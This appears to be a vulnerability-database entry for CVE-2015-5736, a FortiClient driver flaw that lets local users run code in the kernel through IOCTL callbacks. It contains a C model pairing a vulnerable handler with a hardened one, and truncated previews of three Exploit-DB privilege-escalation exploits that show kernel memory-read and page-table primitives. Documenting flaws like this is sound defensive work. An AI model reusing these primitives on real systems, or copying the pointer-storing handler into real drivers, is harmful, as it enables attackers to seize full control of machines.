CVE-2015-5736
Published: 2015-09-03
Priority: P3 · CVSS 2.0: 7.2 (high) · Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
Public exploit available. EPSS: 2.03% (78.6th percentile)
The Fortishield.sys driver in Fortinet FortiClient before 5.2.4 allows local users to execute arbitrary code with kernel privileges by setting the callback function in a (1) 0x220024 or (2) 0x220028 ioctl call.
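Added example, written for this page and not taken from FortiShield.sys or from the Exploit-DB entries below: a user-mode C model of the bug class the description names, an IOCTL handler that stores a caller-supplied 64-bit value as a function pointer and calls it later, beside the hardened shape that accepts only an index into a table of functions compiled into the driver. The two control codes are the ones in the description; the request layout, the NTSTATUS names used for results, and the handler functions are assumptions made for the model.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added model for CVE-2015-5736. Only the two control codes come from the
 * CVE text; request layout, status values and handler names are assumed. */
#define IOCTL_SET_CALLBACK_1 0x220024u   /* from the CVE description */
#define IOCTL_SET_CALLBACK_2 0x220028u   /* from the CVE description */

/* Standard NTSTATUS values, used here as plain return codes. */
#define STATUS_SUCCESS                0x00000000u
#define STATUS_INVALID_DEVICE_REQUEST 0xC0000010u
#define STATUS_BUFFER_TOO_SMALL       0xC0000023u
#define STATUS_INVALID_PARAMETER      0xC000000Du

typedef void (*callback_fn)(void);

/* Assumed request layout: one 64-bit value supplied by the caller. */
struct set_callback_req { uint64_t value; };

static callback_fn g_callback;   /* what the "driver" will call later        */
static int g_last_handler;       /* which built-in handler ran (0 = none)    */
static int g_payload_ran;        /* set when the attacker's function executes */

void model_reset(void) { g_callback = NULL; g_last_handler = 0; g_payload_ran = 0; }
int  model_last_handler(void) { return g_last_handler; }
int  payload_ran(void) { return g_payload_ran; }

/* Vulnerable shape: the caller's value is stored as a code pointer and later
 * dereferenced in kernel context. Whoever can open the device picks the
 * target, which is exactly the condition the CVE describes. */
uint32_t vulnerable_ioctl(uint32_t code, const void *in, size_t in_len) {
    struct set_callback_req req;
    if (code != IOCTL_SET_CALLBACK_1 && code != IOCTL_SET_CALLBACK_2)
        return STATUS_INVALID_DEVICE_REQUEST;
    if (in == NULL || in_len < sizeof req)
        return STATUS_BUFFER_TOO_SMALL;
    memcpy(&req, in, sizeof req);
    g_callback = (callback_fn)(uintptr_t)req.value;   /* caller controls RIP */
    return STATUS_SUCCESS;
}

/* Hardened shape: the value selects an entry in a fixed table of driver
 * functions. No pointer from user mode is stored or called, so there is no
 * target to hijack and nothing for an SMEP bypass to work on. */
static void handler_log(void)   { g_last_handler = 1; }
static void handler_flush(void) { g_last_handler = 2; }
static const callback_fn k_allowed[] = { handler_log, handler_flush };

uint32_t hardened_ioctl(uint32_t code, const void *in, size_t in_len) {
    struct set_callback_req req;
    if (code != IOCTL_SET_CALLBACK_1 && code != IOCTL_SET_CALLBACK_2)
        return STATUS_INVALID_DEVICE_REQUEST;
    if (in == NULL || in_len < sizeof req)
        return STATUS_BUFFER_TOO_SMALL;
    memcpy(&req, in, sizeof req);
    if (req.value >= sizeof k_allowed / sizeof k_allowed[0])
        return STATUS_INVALID_PARAMETER;   /* any raw address lands here */
    g_callback = k_allowed[req.value];
    return STATUS_SUCCESS;
}

/* The deferred call the driver makes later; returns 1 if something ran. */
int fire_callback(void) {
    if (g_callback == NULL) return 0;
    g_callback();
    return 1;
}

/* Stand-in for the attacker's payload (shellcode or a ROP chain in reality). */
static void attacker_payload(void) { g_payload_ran = 1; }

/* The value an attacker would place in the request: the payload's address. */
uint64_t attacker_value(void) { return (uint64_t)(uintptr_t)attacker_payload; }

int main(void) {
    struct set_callback_req req = { attacker_value() };
    model_reset();
    vulnerable_ioctl(IOCTL_SET_CALLBACK_1, &req, sizeof req);
    fire_callback();                                          /* payload runs */
    int hijacked = payload_ran();
    model_reset();
    hardened_ioctl(IOCTL_SET_CALLBACK_1, &req, sizeof req);  /* rejected */
    req.value = 1;
    hardened_ioctl(IOCTL_SET_CALLBACK_2, &req, sizeof req);  /* handler_flush */
    fire_callback();
    return (hijacked == 1 && model_last_handler() == 2 && payload_ran() == 0) ? 0 : 1;
}
```

In the real driver the stored pointer is invoked in ring 0, so on a system with SMEP the attacker cannot simply point it at user-mode shellcode; that is why the Exploit-DB entries below cite SMEP-bypass material and build the page-table and kernel-object primitives seen in their previews. The index-into-table shape removes that whole path, and is the fix a reviewer should ask for rather than a check that the supplied address "looks like kernel memory", which still lets the caller choose any kernel address.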
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | forticlient | <= 5.2.3 | 5.2.4 |
No detection rules found.
Exploit-DB (2018-08-05): Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation
---
```c
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <psapi.h>
#pragma comment (lib,"psapi")

/* Fixed-address scratch area: IOCTL input buffer at 0x1a000000, output buffer at 0x1a001000. */
PULONGLONG leak_buffer = (PULONGLONG)VirtualAlloc((LPVOID)0x000000001a000000, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

/* Kernel read primitive: builds a request for IOCTL 0x22608C that makes the
 * driver copy the QWORD at addr into the output buffer. */
ULONGLONG leakQWORD(ULONGLONG addr, HANDLE driver)
{
	memset((LPVOID)0x000000001a000000, 0x11, 0x1000);
	memset((LPVOID)0x000000001a001000, 0x22, 0x1000);
	leak_buffer[0] = 0x000000001a000008;
	leak_buffer[1] = 0x0000000000000003;
	leak_buffer[4] = 0x000000001a000028;
	leak_buffer[6] = addr - 0x70;          /* target; the 0x70 offset matches the driver's layout */
	DWORD IoControlCode = 0x22608C;
	LPVOID InputBuffer = (LPVOID)0x000000001a000000;
	DWORD InputBufferLength = 0x20;
	LPVOID OutputBuffer = (LPVOID)0x000000001a001000;
	DWORD OutputBufferLength = 0x110;
	DWO
```
Exploit-DB (2017-03-25): Fortinet FortiClient 5.2.3 (Windows 10 x64 Post-Anniversary) - Local Privilege Escalation
---
```c
/*
Check these out:
- https://www.coresecurity.com/system/files/publications/2016/05/Windows%20SMEP%20bypass%20U%3DS.pdf
- https://labs.mwrinfosecurity.com/blog/a-tale-of-bitmaps/
Tested on:
- Windows 10 Pro x64 (Post-Anniversary)
- ntoskrnl.exe: 10.0.14393.953
- FortiShield.sys: 5.2.3.633
Thanks to master @ryujin and @ronin for helping out. And thanks to Morten (@Blomster81) for the MiGetPteAddress :D
*/
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <psapi.h>
#pragma comment (lib,"psapi")
#pragma comment(lib, "gdi32.lib")
#pragma comment(lib, "User32.lib")
#define object_number 0x02
#define accel_array_size 0x2b6
#define STATUS_SUCCESS 0x00000000
typedef void** PPVOID;
typedef struct _tagSERVERINFO {
	UINT64 p
```
Exploit-DB (2017-03-25): Fortinet FortiClient 5.2.3 (Windows 10 x64 Pre-Anniversary) - Local Privilege Escalation
---
```c
/*
Check this out:
- https://www.coresecurity.com/system/files/publications/2016/05/Windows%20SMEP%20bypass%20U%3DS.pdf
Tested on:
- Windows 10 Pro x64 (Pre-Anniversary)
- hal.dll: 10.0.10240.16384
- FortiShield.sys: 5.2.3.633
Thanks to master @ryujin and @ronin for helping out.
*/
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <psapi.h>
#pragma comment (lib,"psapi")

/* Returns the address of the PTE that maps `address`, using the fixed PTE
 * base 0xFFFFF68000000000 of pre-Anniversary Windows 10 (the base was only
 * randomized from the Anniversary Update on, hence the MiGetPteAddress
 * approach in the Post-Anniversary exploit). */
ULONGLONG get_pxe_address_64(ULONGLONG address) {
	ULONGLONG result = address >> 9;
	result = result | 0xFFFFF68000000000;
	result = result & 0xFFFFF6FFFFFFFFF8;
	return result;
}

/* Looks up the kernel base address of a loaded driver by name via
 * EnumDeviceDrivers (psapi), which an unprivileged user can call on this
 * Windows version. */
LPVOID GetBaseAddr(char *drvname) {
	LPVOID drivers[1024];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
```
No writeups or analysis indexed.
References
- http://fortiguard.com/advisory/mulitple-vulnerabilities-in-forticlient
- http://www.fortiguard.com/advisory/mulitple-vulnerabilities-in-forticlient
- http://www.coresecurity.com/advisories/forticlient-antivirus-multiple-vulnerabilities
- http://packetstormsecurity.com/files/133398/FortiClient-Antivirus-Information-Exposure-Access-Control.html
- http://seclists.org/fulldisclosure/2015/Sep/0
- http://www.securityfocus.com/archive/1/536369/100/0/threaded
- http://www.securitytracker.com/id/1033439
- https://www.exploit-db.com/exploits/41721/
- https://www.exploit-db.com/exploits/41722/
- https://www.exploit-db.com/exploits/45149/